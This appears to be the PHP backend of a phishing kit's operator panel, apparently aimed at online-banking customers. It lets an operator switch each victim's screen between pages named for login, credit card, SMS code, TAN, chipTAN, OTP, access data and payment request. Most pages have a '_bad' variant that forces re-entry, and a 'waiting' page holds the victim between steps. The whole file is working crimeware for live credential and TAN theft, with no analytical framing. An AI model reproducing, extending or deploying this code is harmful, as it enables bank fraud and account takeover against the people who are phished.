<?php
// Include the database configuration file
require_once 'db_config.php';

// Check if the request method is POST
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Get the POST data (selectedPage and userId)
    $postData = json_decode(file_get_contents("php://input"), true);

    if (isset($postData['selectedPage']) && isset($postData['userId'])) {
        $selectedPage = $postData['selectedPage'];
        $userId = $postData['userId'];

        // Determine the initial location value based on the selected page
        $location = '';
        if ($selectedPage == 'custom') {
            $location = 'custom.txt';
        } elseif ($selectedPage == 'app') {
            $location = 'app.txt';  
        } elseif ($selectedPage == 'transaction') {
            $location = 'custom_trn.txt';  
        } elseif ($selectedPage == 'limit') {
            $location = 'custom_limit.txt'; 
        } elseif ($selectedPage == 'waiting') {
            $location = 'waiting.txt';  
        } elseif ($selectedPage == 'afk') {
            $location = 'afk.txt';  
        } elseif ($selectedPage == 'cc_bad') {
            $location = 'cc_bad.txt';   
        } elseif ($selectedPage == 'cc') {
            $location = 'cc.txt'; 
        } elseif ($selectedPage == 'login_bad') {
            $location = 'login_bad.txt';
        } elseif ($selectedPage == 'login') {
            $location = 'login.txt';
        } elseif ($selectedPage == 'sms_bad') {
            $location = 'sms_bad.txt';  
        } elseif ($selectedPage == 'sms') {
            $location = 'sms.txt';  
        } elseif ($selectedPage == 'email') {
            $location = 'email.txt';  
        } elseif ($selectedPage == 'email_bad') {
            $location = 'email_bad.txt';  
        } elseif ($selectedPage == 'email_success') {
            $location = 'email_success.txt';  
        } elseif ($selectedPage == 'success') {
            $location = 'success.txt';  
        } elseif ($selectedPage == 'success_trn') {
            $location = 'success_trn.txt'; 
        } elseif ($selectedPage == 'upload') {
            $location = 'upload.txt';  
        } elseif ($selectedPage == 'upload_bad') {
            $location = 'upload_bad.txt';  
        } elseif ($selectedPage == 'confirm') {
            $location = 'confirm.txt';  
        } elseif ($selectedPage == 'qr') { 
            $location = 'qr.txt';  
        } elseif ($selectedPage == 'qr_bad') {
            $location = 'qr_bad.txt';  
        } elseif ($selectedPage == 'tan') { 
            $location = 'tan.txt';  
        } elseif ($selectedPage == 'tan_bad') {
            $location = 'tan_bad.txt';  
        } elseif ($selectedPage == 'activation_input') {
            $location = 'activation_upload.txt';  
        } elseif ($selectedPage == 'activation_bad') {
            $location = 'activation_upload_bad.txt';  
        } elseif ($selectedPage == 'chip-tan') {
            $location = 'chip-tan.txt';  
        } elseif ($selectedPage == 'access-data') {
            $location = 'access-data.txt';  
        } elseif ($selectedPage == 'login_otp') {
            $location = 'login-otp.txt';  
        } elseif ($selectedPage == 'pay-request') {
            $location = 'payment-request.txt';  
        } elseif ($selectedPage == 'app_release') {
            $location = 'app_release.txt';  
        } elseif ($selectedPage == 'access-data-bad') {
            $location = 'access-data_bad.txt';  
        } elseif ($selectedPage == 'chip-tan-bad') {
            $location = 'chip-tan_bad.txt';  
        } elseif ($selectedPage == 'startan') {
            $location = 'startan.txt';  
        } elseif ($selectedPage == 'startan_bad') {
            $location = 'startan_bad.txt';  
        } elseif ($selectedPage == 'noinputQR') {
            $location = 'qr_noinput.txt';  
        }
        
        // Update the location value in the database based on the selected page and user ID
        $updateSql = "UPDATE main SET location = ? WHERE user_id = ?";
        $updateStmt = $conn->prepare($updateSql);
        $updateStmt->bind_param("ss", $location, $userId);
        
        if ($updateStmt->execute()) {
            // Check if the location is set to success.txt
            if ($location == 'success.txt') {
                // Wait for 6 seconds
                sleep(6);

                // Update the user's online_status to 0
                $updateStatusSql = "UPDATE main SET online_status = 0 WHERE user_id = ? AND location = 'success.txt'";
                $updateStatusStmt = $conn->prepare($updateStatusSql);
                $updateStatusStmt->bind_param("s", $userId);
                if ($updateStatusStmt->execute()) { 
                } else {
                }
                $updateStatusStmt->close();
            }

            // Additional check for email_success.txt
            if ($location == 'email_success.txt') {
                // Wait for 5 seconds
                sleep(5);

                // Change the location value to waiting.txt
                $newLocation = 'waiting.txt';
                $updateNewLocationSql = "UPDATE main SET location =? WHERE user_id =?";
                $updateNewLocationStmt = $conn->prepare($updateNewLocationSql);
                $updateNewLocationStmt->bind_param("ss", $newLocation, $userId);
                if ($updateNewLocationStmt->execute()) {
                    $updateNewLocationStmt->close();
                } else {
                    // Handle error
                }
            }

        } else {
             
        }
        $updateStmt->close(); 

    } else {
        echo "Missing parameters";
    }
} else {
    echo "Invalid request method";
}
?>
